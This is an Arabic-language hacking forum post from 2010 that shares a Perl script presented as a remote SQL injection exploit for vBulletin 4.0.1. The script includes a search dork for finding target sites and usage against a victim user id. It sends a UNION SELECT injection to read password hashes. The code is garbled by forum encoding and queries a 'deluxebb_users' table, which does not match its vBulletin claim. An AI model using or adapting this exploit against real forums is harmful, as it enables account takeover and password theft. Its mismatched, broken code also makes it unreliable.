13/05/2010, 18:31
|
المشاركة رقم: 1
|
| المعلومات |
| الكاتب: |
|
| اللقب: |
|
| الصورة الرمزية |
|
|
| البيانات |
| التسجيل : |
Mar 2010 |
| العضوية : |
2 |
| الاهتمامات : |
DZ |
| الإقامة : |
DZ |
| المواضيع : |
466 |
| الردود : |
629 |
| المجموع : |
1,095 |
| بمعدل : |
0.19 يوميا |
| الاختراقات : |
[ra3ch] |
| مجتمعنا : |
[] |
| الصنف : |
Not Hacker |
| آخر تواجد : |
02/01/2018/12:49 |
| سبب الغياب : |
معكم ألي أخر ضربه أدا كتب ربي.. |
| معدل التقييم: |
10 |
| نقاط التقييم: |
18 |
شكراً: 493
تم شكره 194 مرة في 101 مشاركة
| الإتصالات |
| الحالة: |
|
| وسائل الإتصال: |
|
|
vBulletin™ Version 4.0.1 Remote SQL Injection Exploit
كود PHP:
#!/usr/bin/perl
use io::socket;
print q{
#######################################################################
# vbulletin™ version 4.0.1 remote sql injection exploit #
# by indoushka #
# ***91;url***93;www.iq-ty.com/vb***91;/url***93; #
# souk naamane (00213771818860) #
# algeria hackerz ([email protected]) #
# dork: Powered by vbulletin™ version 4.0.1 #
#######################################################################
};
if (!$argv***91;2***93;) {
print q{
usage: Perl vb4.0.1.pl host /directory/ victim_userid
perl vb4.0.1.pl ***91;url***93;www.vb.com***91;/url***93; /forum/ 1
};
}
$server = $argv***91;0***93;;
$dir = $argv***91;1***93;;
$user = $argv***91;2***93;;
$myuser = $argv***91;3***93;;
$mypass = $argv***91;4***93;;
$myid = $argv***91;5***93;;
print "------------------------------------------------------------------------------------------------\r\n";
print "***91;>***93; server: $server\r\n";
print "***91;>***93; dir: $dir\r\n";
print "***91;>***93; userid: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(***91;url***93;http://)//eg;***91;/url***93;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+union+select+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from%20deluxebb_users%20where%20(uid= '".$user ;
print "***91;~***93; prepare to connect...\r\n";
$socket = io::socket::inet->new( proto => "tcp", peeraddr => "$server", peerport => "80") || die "***91;-***93; connection failed";
print "***91;+***93; connected\r\n";
print "***91;~***93; sending query...\r\n";
print $socket "get $path http/1.1\r\n";
print $socket "host: $server\r\n";
print $socket "accept: */*\r\n";
print $socket "connection: Close\r\n\r\n";
print "***91;+***93; done!\r\n\r\n";
print "--***91; report ***93;------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(w{32})/)
{
if ($1 ne 0) {
print "password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
| توقيع : ViRuS_Ra3cH |
|
IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====
===
|
التعديل الأخير تم بواسطة ViRuS_Ra3cH ; 13/05/2010 الساعة 20:21
|
|
|